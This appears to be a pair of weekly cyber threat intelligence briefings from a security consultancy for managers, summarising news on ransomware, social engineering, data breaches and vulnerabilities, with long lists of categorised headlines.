Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review of specialist and general media continues to show that cyber security relies on, and affects, people, especially employees. Groups such as Scattered Spider exploit workplace platforms like Teams to deceive employees, and Gen Z are twice as likely to fall for attacks. QR code-based scams (Quishing) are also increasing, and research shows over 80% of data breaches involve HR documents.
Ransomware remains a serious threat, often enabled by employee actions or insecure systems. Around 40% of incidents include threats of physical harm, and a new ransomware group is targeting multiple countries using techniques including voice phishing. Other attacks continue to cause disruption; for example, Seychelles Commercial Bank suspended internet banking following a cyber incident that led to leaked data.
Technology remains essential. A report highlights the importance of keeping systems updated and maintaining strong detection and response capabilities. Many exploited vulnerabilities are old, yet a third are exploited within a day of disclosure. Looking ahead, AI and quantum computing present emerging risks that must be addressed now.
Our guidance remains unchanged. Awareness and strong controls across people, operations and technology are essential. Employees must be recognised as central to both your cyber risk and resilience.
Top Cyber Stories of the Last Week
HR Documents Appear in 82% of All Data Breaches
New research by Lab 1 has found that HR documents are present in 82% of all data breaches, second only to finance. These files often contain personal information such as addresses and employment history, making them attractive to cyber criminals. Such data can be misused to create synthetic identities or convincing phishing attacks. As cyber threats grow more sophisticated, HR teams are urged to treat employee data protection as a shared responsibility alongside IT. One-off training is not enough; building security requires continuous action and closer collaboration between HR and security leaders.
The Scattered Spider Ransomware Group Is Infiltrating Slack and Microsoft Teams to Target Vulnerable Employees
Scattered Spider, a well-known cyber crime group, has escalated its activities by infiltrating workplace platforms such as Slack and Microsoft Teams to target employees. The group uses convincing impersonation tactics, often posing as internal staff to trick IT teams into resetting passwords or bypassing multifactor authentication. It has also joined internal calls to gather intelligence and adapt its methods in real time. UK and US firms have been hit hardest, with sectors from retail to aviation impacted. Authorities urge firms to adopt phishing-resistant authentication, monitor suspicious logins and keep offline backups to reduce exposure to data theft and operational disruption.
Gen Z Falls for Scams 2x More Than Older Generations
Recent studies reveal that Gen Z is twice as likely to fall for online scams compared to older generations, posing a growing cyber security risk to employers. Their high digital fluency often leads to risky behaviours such as password reuse, multitasking across multiple jobs, and using personal devices for work. As they increasingly rely on freelance and remote roles, attackers exploit this blend of work and personal activity through phishing emails and impersonation scams. Poor credential hygiene and unapproved software use further widen the risk to businesses, especially where bring-your-own-device and remote access are common.
https://www.darkreading.com/cyber-risk/gen-z-scams-2x-more-older-generations
Millions Hit in Quishing Attacks as Malicious QR Codes Surge; How to Stay Safe
Quishing, a form of phishing using malicious QR codes, is on the rise, with over 26 million people reportedly directed to fake websites that harvest passwords and payment details or install harmful software. These codes are often placed in public spaces such as posters or parking meters and are difficult to distinguish visually from legitimate ones. A recent study found that over a quarter of all malicious links are now delivered via QR codes, reflecting a shift away from traditional email scams. As QR codes were never designed with security in mind, extra caution is essential when scanning unfamiliar ones.
Ransomware Attacks Escalate to Physical Threats Against Executives
Ransomware attacks are becoming increasingly aggressive, with a recent report from Semperis showing 40% of incidents now involving threats of physical harm to executives and nearly half involving threats to report the victim to regulators. In the US, 81% of affected firms paid a ransom, over half of those paid more than once, and 15% received no usable decryption key. Victims often face repeated attacks, with 73% suffering multiple incidents. Disruption from ransomware continues to impact operations, causing job losses, data breaches and cancelled insurance. Despite growing resistance to extortion, the majority of targeted organisations still paid, highlighting the need to invest in cyber resilience.
https://www.infosecurity-magazine.com/news/ransomware-attacks-escalate/
Ransomware Up 179%, Credential Theft Up 800%: 2025’s Cyber Threat Landscape Intensifies
Flashpoint’s midyear report paints a stark picture of the cyber threat landscape in 2025, with ransomware incidents up 179% and credential theft soaring by 800%. The first six months saw 1.8 billion credentials stolen and over 9 billion records exposed, largely due to unauthorised access. Manufacturing, technology and legal sectors were particularly affected. Vulnerability disclosures also rose sharply, with 35% of known flaws already exploited. A significant backlog in vulnerability analysis has left many organisations exposed. The report stresses the need for faster patching and better threat intelligence to help firms stay ahead in a rapidly evolving risk environment.
New Chaos Ransomware Emerges, Launches Wave of Attacks
A new ransomware group known as Chaos has launched a wave of opportunistic cyber attacks, affecting organisations across the US, UK, New Zealand and India. First emerging in early 2025, Chaos employs a combination of voice phishing, remote access tools and file encryption to extract data and demand ransoms, typically in the hundreds of thousands of dollars. The group’s tactics include offering 'incentives' for payment and threatening further disruption such as denial-of-service attacks if demands are refused. Researchers believe the gang may have ties to previous threat actors, citing similarities in methods and communication style.
https://www.infosecurity-magazine.com/news/chaos-ransomware-wave-attacks/
Seychelles Commercial Bank Reported Cyber Security Incident
Seychelles Commercial Bank has confirmed a recent cyber security incident that led to a temporary suspension of internet banking services. Although no financial losses were reported, personal data of online banking customers was exposed, including names, contact details, account types and balances. External researchers who analysed the leaked data noted that some affected accounts were labelled as government-related. The bank has advised customers to use ATMs or visit branches while services are restored. The incident has been formally acknowledged by the Central Bank of Seychelles and may draw wider attention due to the country’s role in offshore financial services.
Third of Exploited Vulnerabilities Weaponised Within a Day of Disclosure
VulnCheck’s latest data shows that nearly a third of known exploited software vulnerabilities in 2025 were weaponised within 24 hours of disclosure, up from around a quarter in 2024. Microsoft and Cisco were the most targeted vendors, with content management systems, network devices and server software making up the bulk of affected categories. Russian and Iranian threat actors significantly increased their activity, while Chinese and North Korean groups saw declines. Of the 181 unique vulnerabilities used by recognised threat actors, most had already been exploited before 2025, reinforcing the need for prompt patching and ongoing vigilance.
https://www.infosecurity-magazine.com/news/third-kev-exploited/
Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else
OpenAI’s CEO has warned of an imminent fraud crisis driven by artificial intelligence, where scammers will be able to convincingly mimic voices and even video likenesses to impersonate individuals. Speaking to the US Federal Reserve, he raised concerns about financial institutions still relying on voice authentication, which AI tools can now easily defeat. Real-world cases already show AI being used to trick employees and impersonate officials. While OpenAI claims it is not developing impersonation tools, Altman cautioned that others will, and that organisations must urgently update their authentication methods to avoid being exposed to this growing threat.
https://futurism.com/sam-altman-ai-fraud-crisis-imitate
Getting a Cyber Security Vibe Check on Vibe Coding
Vibe coding, where natural language prompts are used to generate code via AI, is gaining traction but poses clear security risks. A recent study found AI tools made insecure coding choices nearly half the time, with Java faring worst at a 71% failure rate. Common issues include outdated software components, flawed access controls, and unpredictable behaviours like data exposure or deletion. Experts stress that while AI coding tools may speed up prototyping, they remain immature for secure production use. Human code review, vulnerability scanning, and clear development guardrails remain essential to safely benefit from this fast-evolving technology.
https://www.darkreading.com/application-security/cybersecurity-vibe-check-vibe-coding
The Growing Impact of AI and Quantum on Cyber Security
Artificial intelligence and quantum computing are reshaping the digital landscape, offering major efficiency gains but introducing serious cyber security risks. AI-driven cyber attacks are becoming more frequent and harder to detect, with one in four CISOs reporting AI-based threats in the past year. At the same time, quantum computing threatens to undermine current encryption standards, raising urgent concerns about future data protection. Despite these risks, few organisations have a clear plan to adapt. To stay resilient, firms must invest in proactive cyber security, improve workforce skills, and prepare for a post-quantum future before today’s safeguards become obsolete.
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware up 179%, credential theft up 800%: 2025’s cyber onslaught intensifies | CSO Online
After BlackSuit is taken down, new ransomware group Chaos emerges - Ars Technica
New Chaos Ransomware Emerges, Launches Wave of Attacks - Infosecurity Magazine
Ransomware will thrive until we change our strategy - Help Net Security
Ransomware is on the rise, thanks in part to GenAI - Verdict
Ransomware Attacks Escalate to Physical Threats Against Executives - Infosecurity Magazine
'I am afraid of what's next,' ex-ransomware negotiator says • The Register
Scattered Spider is running a VMware ESXi hacking spree
Scattered Spider Hacker Arrests Halt Attacks, But Copycat Threats Sustain Security Pressure
The State of Ransomware – Q2 2025 - Check Point Research
Qilin Ransomware Gain Traction Following Legal Assistance Option for Ransomware Affiliates
Ransomware Payment Bans: Prevention Strategy or Misguided Policy? - IT Security Guru
New UK ransomware rules could affect payments firms
Ransomware upstart Gunra goes cross-platform with encryption upgrades | CSO Online
Cyber criminals ‘Spooked’ After Scattered Spider Arrests - Infosecurity Magazine
Ransomware groups are blurring the line between cybercrime and ‘hacktivism’ - The Economic Times
Ransomware attacks in education jump 23% year over year | Higher Ed Dive
Ransomware ban won't save councils or NHS without urgent cyber investment
FunkSec Ransomware Decryptor Released Free to Public After Group Goes Dormant
Ransomware Victims
NHS provider nears collapse a year after cyberattack • The Register
NASCAR Confirms Personal Information Stolen in Ransomware Attack - SecurityWeek
SafePay ransomware threatens to leak 3.5TB of Ingram Micro data
Why is the National Guard deployed for Minnesota cyberattack? | Stars and Stripes
RTÉ investigating potential cyber security incident – The Irish Times
Minnesota activates National Guard after St. Paul cyberattack
Phishing & Email Based Attacks
Millions hit in quishing attacks as malicious QR codes surge — how to stay safe | Tom's Guide
Attackers Exploit M365 for Internal Phishing | Proofpoint US
Gen Z Falls for Scams 2x More Than Older Generations
Got a suspicious Amazon refund text? Don't click the link - it's a scam | ZDNET
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Cyber attacks target email accounts of senior journalists - Press Gazette
Phishing Scams Hit Aviation Execs, Causing Six-Figure BEC Losses
How attackers are still phishing "phishing-resistant" authentication
2025 Email Threats: AI Phishing Demands Multi-Layered Defences
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Phishing Scams Hit Aviation Execs, Causing Six-Figure BEC Losses
Other Social Engineering
Millions hit in quishing attacks as malicious QR codes surge — how to stay safe | Tom's Guide
Gen Z Falls for Scams 2x More Than Older Generations
Inside a Real Clickfix Attack: How This Social Engineering Hack Unfolds
QR Code Quishing Scams Surge 50%: Tips to Protect Your Data
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Top spy laments LinkedIn profiles that reveal defence work • The Register
Fraud, Scams and Financial Crime
Gen Z Falls for Scams 2x More Than Older Generations
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Got a suspicious Amazon refund text? Don't click the link - it's a scam | ZDNET
11,500 UK companies struck off Companies House register after crackdown - National Crime Agency
Scammers Now Using Google Forms To Hunt Crypto Victims
Who’s Really Behind the Mask? Combatting Identity Fraud - SecurityWeek
Even Scammers Are Turning To AI To Negotiate With Victims
Thai-Cambodian conflict partly provoked by cyber-scams • The Register
Pew: Three quarters of Americans targeted weekly in online scams - UPI.com
Russian soldiers scammed and robbed of war cash on return from Ukraine - BBC News
Artificial Intelligence
Ransomware is on the rise, thanks in part to GenAI - Verdict
Getting a Cyber Security Vibe Check on Vibe Coding
Even Scammers Are Turning To AI To Negotiate With Victims
Overcoming Risks from Chinese GenAI Tool Usage
From Ex Machina to Exfiltration: When AI Gets Too Curious - SecurityWeek
AI is here, security still isn’t - Help Net Security
Azure AI Speech needs seconds of audio to clone voices • The Register
The Growing Impact Of AI And Quantum On Cyber Security
Microsoft Copilot Rooted to Gain Unauthorized Root Access to its Backend System
Microsoft wants you to chat with its browser now - but can you trust this Copilot? | ZDNET
Browser Extensions Pose Serious Threat to Gen-AI Tools Handling Sensitive Data - SecurityWeek
Not just YouTube: Google is using AI to guess your age based on your activity - everywhere | ZDNET
AI-Generated Linux Miner 'Koske' Beats Human Malware
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
British 999 caller's voice cloned by Russian network using AI - BBC News
2FA/MFA
Malware
Sophisticated Shuyal Stealer Targets 19 Browsers
AI-Generated Linux Miner 'Koske' Beats Human Malware
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Russian Intelligence blamed for malware tool
Over 200 Malicious Open Source Packages Traced to Lazarus Campaign - Infosecurity Magazine
Report Links Chinese Companies to Tools Used by State-Sponsored Hackers - SecurityWeek
Hafnium Tied to Advanced Chinese Surveillance Tools - Infosecurity Magazine
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Hackers Breach Toptal GitHub, Publish 10 Malicious npm Packages With 5,000 Downloads
Do Macs Get Viruses? How to Scan for a Mac Virus - CNET
Bots/Botnets
Secrets are leaking everywhere, and bots are to blame - Help Net Security
Mobile
ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials
Android Malware Targets Banking Users Through Discord Channels - Infosecurity Magazine
Denial of Service/DoS/DDoS
DDoS-protection crisis looms as attacks grow – Computerworld
Internet of Things – IoT
Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access
Data Breaches/Leaks
Allianz Life: Insurance giant says most US customer data stolen in cyber-attack - BBC News
Seychelles Commercial Bank Reported Cybersecurity Incident
HR documents appear in 82% of all data breaches, finds Lab 1 | UNLEASH
French telecom giant Orange discloses cyber attack
IR35 advisor Qdos confirms a data leak to techie clients • The Register
French defence firm Naval Group investigates cyber leak
How Military Devices are Slipping Through the Cracks
Hackers Allegedly Breach Nokia’s Internal Network – DataBreaches.Net
Tea Dating Advice app spills sensitive data • Graham Cluley
NASCAR Confirms Personal Information Stolen in Ransomware Attack - SecurityWeek
Lovense sex toy app flaw leaks private user email addresses
Organised Crime & Criminal Actors
The Young & the Restless: Cybercriminals Raise Concerns
Thai-Cambodian conflict partly provoked by cyber-scams • The Register
Hackers plant 4G Raspberry Pi on bank network in failed ATM heist
US Now Top Target for Dark Web Cyberthreats
A US cybercrime group is targeting banks and credit unions | American Banker
FBI opens first office in New Zealand ‘to counter China and cybercrime’ | FBI | The Guardian
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Scammers Now Using Google Forms To Hunt Crypto Victims
AI-Generated Linux Miner 'Koske' Beats Human Malware
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Insider Risk and Insider Threats
What the Coinbase Breach Says About Insider Risk
Insurance
Supply Chain and Third Parties
Your supply chain security strategy might be missing the biggest risk - Help Net Security
Hackers Allegedly Breach Nokia’s Internal Network – DataBreaches.Net
Cloud/SaaS
Attackers Exploit M365 for Internal Phishing | Proofpoint US
Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials
Microsoft exec admits it 'cannot guarantee' data sovereignty • The Register
UK to rein in Microsoft, AWS with 'strategic market status' • The Register
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Microsoft investigates outage affecting Microsoft 365 admin center
Outages
Microsoft investigates outage affecting Microsoft 365 admin center
Global Starlink outage disrupts Ukrainian front lines
Starlink Faces Another Brief Outage | PCMag
Why did the air traffic control outage cause so much havoc? - BBC News
Encryption
The Growing Impact Of AI And Quantum On Cybersecurity
Google says UK government has not demanded an encryption backdoor for its users' data | TechCrunch
A UK Government Order Threatens the Privacy and Security of All Internet Users - Internet Society
Linux and Open Source
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Passwords, Credential Stuffing & Brute Force Attacks
Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials
Ransomware up 179%, credential theft up 800%: 2025’s cyber onslaught intensifies | CSO Online
Why stolen credentials remain cyber criminals’ tool of choice - Help Net Security
ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials
Social Media
Top spy laments LinkedIn profiles that reveal defence work • The Register
Malvertising
Regulations, Fines and Legislation
The top 3 cybersecurity risks posed by the Online Safety Act and age verification | Tom's Guide
UK to rein in Microsoft, AWS with 'strategic market status' • The Register
VPNs can get around the UK's age verification laws – but is it necessary? | Tom's Guide
UK Online Safety Act Triggers 1400% VPN Surge Amid Ban Fears
Internet age verification begins rollout, and it's as bad as you'd expect
A UK Government Order Threatens the Privacy and Security of All Internet Users - Internet Society
Ransomware ban won't save councils or NHS without urgent cyber investment
UK web surfers warned of cyber security risks following new Online Safety Act - Stoke-on-Trent Live
New UK ransomware rules could affect payments firms
A Court Ruling on Bug Bounties Just Made the Internet Less Safe - Infosecurity Magazine
Banning VPNs to protect kids? Good luck with that • The Register
Government layoffs are making us less safe in cyberspace, experts fear - Nextgov/FCW
Models, Frameworks and Standards
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
CISA Unveils Eviction Strategies Tool to Aid Incident Response - Infosecurity Magazine
Careers, Working in Cyber and Information Security
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
Cyber security professionals facing burnout as threats mount - CIR Magazine
Law Enforcement Action and Take Downs
Scattered Spider Hacker Arrests Halt Attacks, But Copycat Threats Sustain Security Pressure
Cyber criminals ‘Spooked’ After Scattered Spider Arrests - Infosecurity Magazine
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Top spy laments LinkedIn profiles that reveal defence work • The Register
'Fire Ant' Cyber Spies Compromise Siloed VMware Systems
Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor
Kremlin goons caught abusing local ISPs to spy on diplomats • The Register
Russia's Secret Blizzard APT Gains Embassy Access
Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats | Microsoft Security Blog
US Army Building Global IT Warfighting Platform To Prepare for Cyber Warfare | AFCEA International
Nation State Actors
Microsoft’s software licensing playbook is a national security risk | CyberScoop
China
Microsoft’s software licensing playbook is a national security risk | CyberScoop
Top spy laments LinkedIn profiles that reveal defence work • The Register
Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments
'Fire Ant' Cyber Spies Compromise Siloed VMware Systems
Report Links Chinese Companies to Tools Used by State-Sponsored Hackers - SecurityWeek
Hafnium Tied to Advanced Chinese Surveillance Tools - Infosecurity Magazine
Overcoming Risks from Chinese GenAI Tool Usage
Chinese Hackers Weaponize Software Vulnerabilities to Compromise Their Targets
CISA to Release Salt Typhoon Report on Telecom Security
FBI opens first office in New Zealand ‘to counter China and cybercrime’ | FBI | The Guardian
Scoop: US intelligence intervened with DOJ to push HPE-Juniper merger
Chinese Researchers Suggest Lasers and Sabotage to Counter Musk’s Starlink Satellites - SecurityWeek
Russia
Top spy laments LinkedIn profiles that reveal defence work • The Register
Kremlin goons caught abusing local ISPs to spy on diplomats • The Register
Russia's Secret Blizzard APT Gains Embassy Access
Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats | Microsoft Security Blog
Russian Intelligence blamed for malware tool
Global Starlink outage disrupts Ukrainian front lines
British 999 caller's voice cloned by Russian network using AI - BBC News
Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor
Russian soldiers scammed and robbed of war cash on return from Ukraine - BBC News
Pro-Ukraine Hacktivists Ground Dozens of Aeroflot Flights - Infosecurity Magazine
Who is Silent Crow? Pro-Ukraine hackers take down Russian airline Aeroflot | The Independent
Iran
North Korea
Over 200 Malicious Open Source Packages Traced to Lazarus Campaign - Infosecurity Magazine
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Ransomware groups are blurring the line between cybercrime and ‘hacktivism’ - The Economic Times
Who is Silent Crow? Pro-Ukraine hackers take down Russian airline Aeroflot | The Independent
Tools and Controls
The top 3 cyber security risks posed by the Online Safety Act and age verification | Tom's Guide
How the Browser Became the Main Cyber Battleground
Microsoft’s software licensing playbook is a national security risk | CyberScoop
VPNs can get around the UK's age verification laws – but is it necessary? | Tom's Guide
A Court Ruling on Bug Bounties Just Made the Internet Less Safe - Infosecurity Magazine
DDoS-protection crisis looms as attacks grow – Computerworld
Getting a Cyber Security Vibe Check on Vibe Coding
Security pros drowning in threat-intel data • The Register
How to discover and manage shadow APIs | TechTarget
Another top vibe coding platform has some worrying security flaws - here's what we know | TechRadar
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
UK web surfers warned of cyber security risks following new Online Safety Act - Stoke-on-Trent Live
Alert Fatigue, Data Overload, and the Fall of Traditional SIEMs
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
CISA Unveils Eviction Strategies Tool to Aid Incident Response - Infosecurity Magazine
Banning VPNs to protect kids? Good luck with that • The Register
Other News
How the Browser Became the Main Cyber Battleground
The food supply chain has a cybersecurity problem - Help Net Security
Minnesota activates National Guard after St. Paul cyberattack
Is retail a sitting duck for cybercriminals? | Retail Week
Intelligence sharing: The boost for businesses | IT Pro
World told cyber threats must be tackled
The legal minefield of hacking back - Help Net Security
The final frontier of cybersecurity is now in space - Help Net Security
Service Levels for MSSPs: Elevating Security-Specific Services | MSSP Alert
Vulnerability Management
Third of Exploited Flaws Weaponized Within a Day of Disclosure - Infosecurity Magazine
Chinese Hackers Weaponize Software Vulnerabilities to Compromise Their Targets
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
Spikes in malicious activity precede new security flaws in 80% of cases
Vulnerabilities
Exploit available for critical Cisco ISE bug exploited in attacks
Another top vibe coding platform has some worrying security flaws - here's what we know | TechRadar
Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Scattered Spider is running a VMware ESXi hacking spree
Microsoft: macOS Sploitlight flaw leaks Apple Intelligence data
Apple fixed a zero-day exploited in attacks against Google Chrome users
Google Patches Vulnerability That Let Anyone Hide Search Results
Critical Flaws in WordPress Plugin Leave 10,000 Sites Vulnerable - Infosecurity Magazine
CISA flags PaperCut RCE bug as exploited in attacks, patch now
New Lenovo UEFI firmware updates fix Secure Boot bypass flaws
Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install
Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 25 July 2025
Black Arrow Cyber Threat Intelligence Briefing 25 July 2025:
-158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Employee’s Weak Password
-Hackers Fooled Cognizant Help Desk, Says Clorox in $380M Cyber Attack Lawsuit
-US Nuclear Weapons Agency ‘Among 400 Organisations Breached by Chinese Hackers’ Exploiting Microsoft SharePoint Vulnerability
-Europe Sees Cyber Attacks Surge Amid Geopolitical Tensions
-68% of Organisations Experienced Data Leakage from Employee AI Usage
-Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
-Cyber Turbulence Ahead as Airlines Strap In for a Security Crisis
-Nearly Half of Managed Service Providers (MSPs) Have Dedicated Kitty for Ransomware Incidents
-UK Confirms Ransomware Payment Ban for Public Sector and CNI
-University Student Who Sold More than a Thousand Phishing Kits to Fraudsters is Jailed
-$15M Reward Offered as American Woman Jailed in North Korea IT Worker Scam
-UK Announces Sanctions Against Russian Cyber Units Over Threats to Europe
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review of cyber security intelligence from specialist and public media this week starts with details of three recently disclosed attacks, including an attack causing the collapse of a firm that was almost 160 years old. The attacks were attributed to weak passwords and verification controls, and in one case to the exploitation of a vulnerability in on-premises SharePoint. We share details of a warning of increased attacks during the summer travel season, and the high percentage of organisations suffering data leakage when employees use AI tools, often in an unauthorised manner.
We report on a survey that found almost half of IT managed service providers have funds allocated for paying ransoms, while the UK government has banned public sector and critical national infrastructure organisations from paying ransoms. We include reports of increased attacks in the airline sector, and more widely across Europe as a result of the geopolitical landscape. We also include news of successful legal action against cyber attackers including a student who sold phishing kits, and a US citizen who was helping North Koreans to infiltrate organisations as fake IT workers, as well as UK government sanctions against attackers in the Russian military.
Top Cyber Stories of the Last Week
158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Employee’s Weak Password
The collapse of a 158-year-old company in the UK, KNP Logistics, highlights how even a single weak password can devastate an entire business. Hackers exploited poor password hygiene to deploy ransomware, halting operations and forcing the firm into administration. The attack exposed wider issues: outdated systems, lack of multi-factor authentication, and insufficient user training, all of which allowed cyber criminals to move freely within the network. With over 700 jobs lost and supply chains disrupted, KNP’s fate is a stark warning: even well-established companies are at risk when basic cyber security measures are overlooked. Strong credentials and proactive defence are not optional; they are business-critical.
Hackers Fooled Cognizant Help Desk, Says Clorox in $380M Cyber Attack Lawsuit
US manufacturer Clorox has filed a $380 million lawsuit against IT provider Cognizant, alleging gross negligence in a cyber attack that severely disrupted its operations. The claim centres on a help desk agent who reset credentials without verifying identity, allowing criminals to access Clorox’s systems. This led to halted manufacturing, product shortages and a lengthy recovery effort. Clorox says the attackers repeated the tactic to gain deeper access, including into IT security accounts. It further accuses Cognizant of failing to follow agreed procedures and compounding the damage through a poor incident response, with underqualified support and delayed containment efforts. Cognizant has disputed Clorox’s version of events.
US Nuclear Weapons Agency ‘Among 400 Organisations Breached by Chinese Hackers’ Exploiting Microsoft SharePoint Vulnerability
Microsoft has confirmed that several China-linked hacking groups have exploited security flaws in its on-premises SharePoint servers, resulting in breaches at over 400 organisations, including US government agencies. The National Nuclear Security Administration was reportedly among those affected. Microsoft has issued security updates and is urging all users to apply them, warning that attacks are likely to continue. SharePoint remains widely used by large organisations for document collaboration, making the scale of the threat particularly concerning for those operating older systems.
Europe Sees Cyber Attacks Surge Amid Geopolitical Tensions
Check Point has reported a sharp global rise in cyber attacks, with weekly incidents reaching nearly 2,000 per organisation; a 143% increase over four years. Europe saw the steepest annual growth, up 22%, driven by geopolitical tensions and fragmented regulation. Sectors under sustained pressure include education, government, and telecommunications, with education alone facing over 4,300 weekly attacks. One in four ransomware attacks now affect European firms, with business services and manufacturing the most targeted. The report warns that a reactive stance is no longer viable and urges a prevention-first approach with layered defences and clear visibility of threats.
https://cybernews.com/security/cyberattacks-surge-in-north-america-and-europe/
68% of Organisations Experienced Data Leakage from Employee AI Usage
A recent survey has found that 68% of organisations have experienced data leakage incidents linked to staff sharing sensitive information with AI tools. This comes despite 90% of respondents expressing confidence in their existing cyber security controls. Only 23% of organisations have implemented dedicated AI security policies. Looking ahead, 80% of respondents said that building a strong internal security culture remains their biggest challenge. As AI adoption accelerates, many security leaders are shifting their focus from traditional operations to strengthening infrastructure and staff awareness, particularly in light of rising ransomware threats and risks tied to third-party AI suppliers.
Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
Mobile security provider Zimperium has warned of a sharp rise in mobile-related cyber threats during the busy summer travel season. Over 5 million unsecured public Wi-Fi networks have been identified globally in 2025, with a third of users still connecting to them. Mobile devices, now a key access point for corporate data, are increasingly exposed to risks such as phishing disguised as travel updates, malicious apps, and data theft via public Wi-Fi. The threat is particularly high in Southeast Asia and across major cities. Organisations are urged to strengthen mobile defences and ensure employee devices remain protected while travelling.
Cyber Turbulence Ahead as Airlines Strap In for a Security Crisis
Cyber threats targeting the aviation sector are increasing in both frequency and severity, driven by greater system connectivity and heightened geopolitical tensions. Recent attacks have disrupted flights, exposed sensitive passenger data, and caused significant financial losses. Ransomware activity alone has risen by 600% over the past year. Regulatory bodies across the US, EU and globally are strengthening cyber security standards, with mandatory requirements due by 2025. However, fragmented compliance obligations, ageing technology, and widespread reliance on social engineering tactics continue to expose the industry. Despite higher-than-average cyber security investment, effective staff training and better supply chain oversight remain critical.
https://www.helpnetsecurity.com/2025/07/21/aviation-industry-cybersecurity-crisis/
Nearly Half of Managed Service Providers (MSPs) Have Dedicated Kitty for Ransomware Incidents
A multinational survey reports that nearly half of managed service providers (MSPs) have set aside funds specifically for ransomware payments, despite growing pressure from insurers and governments to avoid doing so. The survey found that 45% had a dedicated budget for this, while 36% rely on cyber insurance. However, 11% had no financial safeguards in place at all. Concerns are now shifting toward artificial intelligence, with 67% of MSPs reporting AI-driven attacks last year. As AI threats escalate in scale and sophistication, 84% of MSP clients now expect their providers to manage cyber security as part of their core services, underscoring the need for proactive defences.
UK Confirms Ransomware Payment Ban for Public Sector and CNI
The UK government will ban public sector and critical national infrastructure organisations from paying ransomware demands, following strong support during a public consultation. The aim is to deter attackers by removing financial incentives and better protect essential services like healthcare, education and transport. Alongside this, a new mandatory reporting regime will be introduced to help law enforcement gather intelligence and disrupt criminal networks. However, some experts have raised concerns that these measures could lead to underreporting, misuse of third parties, or increased pressure on private sector firms still permitted to pay, potentially creating a two-tier risk landscape.
https://www.infosecurity-magazine.com/news/uk-ransomware-payment-ban-public/
University Student Who Sold More than a Thousand Phishing Kits to Fraudsters is Jailed
A 21-year-old university student has been jailed for seven years after selling over 1,000 phishing kits that enabled criminals to impersonate legitimate organisations and steal personal and financial information. The kits, distributed via encrypted platforms, targeted 69 institutions across 24 countries, contributing to an estimated £100 million in global losses. Authorities described the operation as highly organised, with the individual offering ongoing technical support to other fraudsters. This case underscores how cyber criminals are monetising phishing tools at scale and highlights the growing need for organisations to protect against deceptive online tactics designed to exploit customers and brand trust.
$15M Reward Offered as American Woman Jailed in North Korea IT Worker Scam
